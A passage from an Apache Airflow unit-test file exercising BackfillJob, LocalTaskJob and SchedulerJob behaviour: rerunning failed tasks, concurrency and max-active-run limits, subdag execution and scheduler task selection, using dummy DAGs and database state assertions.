'example_kubernetes_executor', # requires kubernetes cluster
'example_kubernetes_operator' # requires kubernetes cluster
]
logger = logging.getLogger('BackfillJobTest.test_backfill_examples')
dags = [
dag for dag in self.dagbag.dags.values()
if 'example_dags' in dag.full_filepath and dag.dag_id not in skip_dags
]
for dag in dags:
dag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
for i, dag in enumerate(sorted(dags, key=lambda d: d.dag_id)):
logger.info('*** Running example DAG #{}: {}'.format(i, dag.dag_id))
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True)
job.run()
def test_backfill_conf(self):
dag = DAG(
dag_id='test_backfill_conf',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='op',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
conf = json.loads("""{"key": "value"}""")
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
conf=conf)
job.run()
dr = DagRun.find(dag_id='test_backfill_conf')
self.assertEqual(conf, dr[0].conf)
def test_backfill_rerun_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
def test_backfill_rerun_upstream_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_upstream_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
t1 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-1',
dag=dag)
t2 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-2',
dag=dag)
t1.set_upstream(t2)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UPSTREAM_FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks_without_flag(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=False
)
with self.assertRaises(AirflowException):
job.run()
def test_backfill_ordered_concurrent_execute(self):
dag = DAG(
dag_id='test_backfill_ordered_concurrent_execute',
start_date=DEFAULT_DATE,
schedule_interval="@daily")
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
# test executor history keeps a list
history = executor.history
# check if right order. Every loop has a 'pause' (0) to change state
# from RUNNING to SUCCESS.
# 6,0,3,0,3,0,3,0 = 8 loops
self.assertEqual(8, len(history))
loop_count = 0
while len(history) > 0:
queued_tasks = history.pop(0)
if loop_count == 0:
# first loop should contain 6 tasks (3 days x 2 tasks)
self.assertEqual(6, len(queued_tasks))
if loop_count == 2 or loop_count == 4 or loop_count == 6:
# 3 days x 1 task
self.assertEqual(3, len(queued_tasks))
loop_count += 1
def test_backfill_pooled_tasks(self):
"""
Test that queued tasks are executed by BackfillJob
Test for https://github.com/airbnb/airflow/pull/1225
"""
session = settings.Session()
pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
session.add(pool)
session.commit()
dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# run with timeout because this creates an infinite loop if not
# caught
with timeout(seconds=30):
job.run()
ti = TI(
task=dag.get_task('test_backfill_pooled_task'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_depends_on_past(self):
"""
Test that backfill respects ignore_depends_on_past
"""
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
# backfill should deadlock
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
BackfillJob(dag=dag, start_date=run_date, end_date=run_date).run)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
ignore_first_depends_on_past=True).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
def test_run_ignores_all_dependencies(self):
"""
Test that run respects ignore_all_dependencies
"""
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
DEFAULT_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=DEFAULT_DATE)
ti_dependent0.refresh_from_db()
self.assertEquals(ti_dependent0.state, State.FAILED)
task1_id = 'test_run_dependency_task'
args1 = ['run',
'-A',
dag_id,
task1_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args1))
ti_dependency = TI(
task=dag.get_task(task1_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependency.refresh_from_db()
self.assertEquals(ti_dependency.state, State.FAILED)
task2_id = 'test_run_dependent_task'
args2 = ['run',
'-A',
dag_id,
task2_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args2))
ti_dependent = TI(
task=dag.get_task(task2_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependent.refresh_from_db()
self.assertEquals(ti_dependent.state, State.SUCCESS)
def test_run_naive_taskinstance(self):
"""
Test that we can run naive (non-localized) task instances
"""
NAIVE_DATE = datetime.datetime(2016, 1, 1)
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
NAIVE_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=NAIVE_DATE)
ti_dependent0.refresh_from_db()
self.assertEquals(ti_dependent0.state, State.FAILED)
def test_cli_backfill_depends_on_past(self):
"""
Test that CLI respects -I argument
"""
dag_id = 'test_dagrun_states_deadlock'
run_date = DEFAULT_DATE + datetime.timedelta(days=1)
args = [
'backfill',
dag_id,
'-l',
'-s',
run_date.isoformat(),
]
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
cli.backfill,
self.parser.parse_args(args))
cli.backfill(self.parser.parse_args(args + ['-I']))
ti = TI(dag.get_task('test_depends_on_past'), run_date)
ti.refresh_from_db()
# task ran
self.assertEqual(ti.state, State.SUCCESS)
dag.clear()
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay_on_limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
self.assertEqual(0.5, parsed_args.delay_on_limit)
def _get_dag_test_max_active_limits(self, dag_id, max_active_runs=1):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval="@hourly",
max_active_runs=max_active_runs
)
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
dag.clear()
return dag
def test_backfill_max_limit_check_within_limit(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_within_limit',
max_active_runs=16)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
self.assertEqual(2, len(dagruns))
self.assertTrue(all([run.state == State.SUCCESS for run in dagruns]))
def test_backfill_max_limit_check(self):
dag_id = 'test_backfill_max_limit_check'
run_id = 'test_dagrun'
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
dag_run_created_cond = threading.Condition()
def run_backfill(cond):
cond.acquire()
try:
dag = self._get_dag_test_max_active_limits(dag_id)
# this session object is different than the one in the main thread
thread_session = settings.Session()
# Existing dagrun that is not within the backfill range
dag.create_dagrun(
run_id=run_id,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
start_date=DEFAULT_DATE,
)
thread_session.commit()
cond.notify()
finally:
cond.release()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
thread_session.close()
backfill_job_thread = threading.Thread(target=run_backfill,
name="run_backfill",
args=(dag_run_created_cond,))
dag_run_created_cond.acquire()
session = settings.Session()
backfill_job_thread.start()
try:
# at this point backfill can't run since the max_active_runs has been
# reached, so it is waiting
dag_run_created_cond.wait(timeout=1.5)
dagruns = DagRun.find(dag_id=dag_id)
dr = dagruns[0]
self.assertEqual(1, len(dagruns))
self.assertEqual(dr.run_id, run_id)
# allow the backfill to execute by setting the existing dag run to SUCCESS,
# backfill will execute dag runs 1 by 1
dr.set_state(State.SUCCESS)
session.merge(dr)
session.commit()
session.close()
backfill_job_thread.join()
dagruns = DagRun.find(dag_id=dag_id)
self.assertEqual(3, len(dagruns)) # 2 from backfill + 1 existing
self.assertEqual(dagruns[-1].run_id, dr.run_id)
finally:
dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_no_count_existing')
start_date = DEFAULT_DATE
end_date = DEFAULT_DATE
# Existing dagrun that is within the backfill range
dag.create_dagrun(run_id="test_existing_backfill",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
# BackfillJob will run since the existing DagRun does not count for the max
# active limit since it's within the backfill date range.
dagruns = DagRun.find(dag_id=dag.dag_id)
# will only be able to run 1 (the existing one) since there's just
# one dag run slot left given the max_active_runs limit
self.assertEqual(1, len(dagruns))
self.assertEqual(State.SUCCESS, dagruns[0].state)
def test_backfill_max_limit_check_complete_loop(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_complete_loop')
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
# Given the max limit to be 1 in active dag runs, we need to run the
# backfill job 3 times
success_expected = 2
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
self.assertEqual(success_expected, success_dagruns)
self.assertEqual(0, running_dagruns) # no dag_runs in running state are left
def test_sub_set_subdag(self):
dag = DAG(
'test_sub_set_subdag',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
sub_dag = dag.sub_dag(task_regex="leave*",
include_downstream=False,
include_upstream=False)
job = BackfillJob(dag=sub_dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
job.run()
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(BackfillJob.ID_FORMAT_PREFIX.format(DEFAULT_DATE.isoformat()),
dr.run_id)
for ti in dr.get_task_instances():
if ti.task_id == 'leave1' or ti.task_id == 'leave2':
self.assertEqual(State.SUCCESS, ti.state)
else:
self.assertEqual(State.NONE, ti.state)
def test_backfill_fill_blanks(self):
dag = DAG(
'test_backfill_fill_blanks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'},
)
with dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2')
op3 = DummyOperator(task_id='op3')
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
op6 = DummyOperator(task_id='op6')
dag.clear()
dr = dag.create_dagrun(run_id='test',
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
executor = TestExecutor(do_update=True)
session = settings.Session()
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == op1.task_id:
ti.state = State.UP_FOR_RETRY
ti.end_date = DEFAULT_DATE
elif ti.task_id == op2.task_id:
ti.state = State.FAILED
elif ti.task_id == op3.task_id:
ti.state = State.SKIPPED
elif ti.task_id == op4.task_id:
ti.state = State.SCHEDULED
elif ti.task_id == op5.task_id:
ti.state = State.UPSTREAM_FAILED
# op6 = None
session.merge(ti)
session.commit()
session.close()
job = BackfillJob(dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor)
self.assertRaisesRegexp(
AirflowException,
'Some task instances failed',
job.run)
self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
# the run_id should have changed, so a refresh won't work
drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
dr = drs[0]
self.assertEqual(dr.state, State.FAILED)
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
self.assertEqual(ti.state, State.SUCCESS)
elif ti.task_id == op2.task_id:
self.assertEqual(ti.state, State.FAILED)
elif ti.task_id == op3.task_id:
self.assertEqual(ti.state, State.SKIPPED)
elif ti.task_id == op5.task_id:
self.assertEqual(ti.state, State.UPSTREAM_FAILED)
def test_backfill_execute_subdag(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.schedule_interval = '@daily'
start_date = timezone.utcnow()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=start_date,
end_date=start_date,
executor=executor,
donot_pickle=True)
job.run()
history = executor.history
subdag_history = history[0]
# check that all 5 task instances of the subdag 'section-1' were executed
self.assertEqual(5, len(subdag_history))
for sdh in subdag_history:
ti = sdh[3]
self.assertIn('section-1-task-', ti.task_id)
subdag.clear()
dag.clear()
def test_backfill_execute_subdag_with_removed_task(self):
"""
Ensure that subdag operators execute properly in the case where
an associated task of the subdag has been removed from the dag
definition, but has instances in the database from previous runs.
"""
dag = self.dagbag.get_dag('example_subdag_operator')
subdag = dag.get_task('section-1').subdag
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=subdag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
donot_pickle=True)
removed_task_ti = TI(
task=DummyOperator(task_id='removed_task'),
execution_date=DEFAULT_DATE,
state=State.REMOVED)
removed_task_ti.dag_id = subdag.dag_id
session = settings.Session()
session.merge(removed_task_ti)
with timeout(seconds=30):
job.run()
for task in subdag.tasks:
instance = session.query(TI).filter(
TI.dag_id == subdag.dag_id,
TI.task_id == task.task_id,
TI.execution_date == DEFAULT_DATE).first()
self.assertIsNotNone(instance)
self.assertEqual(instance.state, State.SUCCESS)
removed_task_ti.refresh_from_db()
self.assertEqual(removed_task_ti.state, State.REMOVED)
subdag.clear()
dag.clear()
def test_update_counters(self):
dag = DAG(
dag_id='test_manage_executor_state',
start_date=DEFAULT_DATE)
task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
job = BackfillJob(dag=dag)
session = settings.Session()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 1)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 1)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 1)
self.assertTrue(len(ti_status.to_run) == 0)
ti_status.failed.clear()
# test for reschedule
# test for failed
ti.set_state(State.NONE, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status)
self.assertTrue(len(ti_status.running) == 0)
self.assertTrue(len(ti_status.succeeded) == 0)
self.assertTrue(len(ti_status.skipped) == 0)
self.assertTrue(len(ti_status.failed) == 0)
self.assertTrue(len(ti_status.to_run) == 1)
session.close()
def test_dag_get_run_dates(self):
def get_test_dag_for_backfill(schedule_interval=None):
dag = DAG(
dag_id='test_get_dates',
start_date=DEFAULT_DATE,
schedule_interval=schedule_interval)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
return dag
test_dag = get_test_dag_for_backfill()
self.assertEqual([DEFAULT_DATE], test_dag.get_run_dates(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE))
test_dag = get_test_dag_for_backfill(schedule_interval="@hourly")
self.assertEqual([DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE],
test_dag.get_run_dates(
start_date=DEFAULT_DATE - datetime.timedelta(hours=3),
end_date=DEFAULT_DATE,))
class LocalTaskJobTest(unittest.TestCase):
def setUp(self):
pass
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ret = job1.heartbeat_callback()
self.assertEqual(ret, None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for i in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
job1 = LocalTaskJob(task_instance=ti_run,
ignore_ti_state=True,
executor=SequentialExecutor())
with patch.object(BaseTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
class SchedulerJobTest(unittest.TestCase):
def setUp(self):
self.dagbag = DagBag()
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.ImportError).delete()
session.commit()
@staticmethod
def run_single_scheduler_loop_with_no_dags(dags_folder):
"""
Utility function that runs a single scheduler loop without actually
changing/scheduling any dags. This is useful to simulate the other side effects of
running a scheduler loop, e.g. to see what parse errors there are in the
dags_folder.
:param dags_folder: the directory to traverse
:type directory: str
"""
scheduler = SchedulerJob(
dag_id='this_dag_doesnt_exist', # We don't want to actually run anything
num_runs=1,
subdir=os.path.join(dags_folder))
scheduler.heartrate = 0
scheduler.run()
def _make_simple_dag_bag(self, dags):
return SimpleDagBag([SimpleDag(dag) for dag in dags])
def test_process_executor_events(self):
dag_id = "test_process_executor_events"
dag_id2 = "test_process_executor_events_2"
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
dag2 = DAG(dag_id=dag_id2, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag2, task_id=task_id_1)
dagbag1 = self._make_simple_dag_bag([dag])
dagbag2 = self._make_simple_dag_bag([dag2])
scheduler = SchedulerJob()
session = settings.Session()
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.QUEUED
session.merge(ti1)
session.commit()
executor = TestExecutor()
executor.event_buffer[ti1.key] = State.FAILED
scheduler.executor = executor
# dag bag does not contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag2)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.QUEUED)
# dag bag does contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.FAILED)
ti1.state = State.SUCCESS
session.merge(ti1)
session.commit()
executor.event_buffer[ti1.key] = State.SUCCESS
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.SUCCESS)
def test_execute_task_instances_is_paused_wont_execute(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_is_paused_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
dr1.state = State.RUNNING
dagmodel = models.DagModel()
dagmodel.dag_id = dag_id
dagmodel.is_paused = True
session.merge(ti1)
session.merge(dr1)
session.add(dagmodel)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti1.state)
def test_execute_task_instances_no_dagrun_task_will_execute(self):
"""
Tests that tasks without dagrun still get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_no_dagrun_task_will_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
ti1.execution_date = ti1.execution_date + datetime.timedelta(days=1)
session.merge(ti1)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.QUEUED, ti1.state)
def test_execute_task_instances_backfill_tasks_wont_execute(self):
"""
Tests that backfill tasks won't get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_backfill_tasks_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.run_id = BackfillJob.ID_PREFIX + '_blah'
ti1 = TI(task1, dr1.execution_date)
ti1.refresh_from_db()
ti1.state = State.SCHEDULED
session.merge(ti1)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti1.state)
def test_find_executable_task_instances_backfill_nodagrun(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_backfill_nodagrun'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr2.run_id = BackfillJob.ID_PREFIX + 'asdf'
ti_no_dagrun = TI(task1, DEFAULT_DATE - datetime.timedelta(days=1))
ti_backfill = TI(task1, dr2.execution_date)
ti_with_dagrun = TI(task1, dr1.execution_date)
# ti_with_paused
ti_no_dagrun.state = State.SCHEDULED
ti_backfill.state = State.SCHEDULED
ti_with_dagrun.state = State.SCHEDULED
session.merge(dr2)
session.merge(ti_no_dagrun)
session.merge(ti_backfill)
session.merge(ti_with_dagrun)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti_no_dagrun.key, res_keys)
self.assertIn(ti_with_dagrun.key, res_keys)
def test_find_executable_task_instances_pool(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_pool'
task_id_1 = 'dummy'
task_id_2 = 'dummydummy'
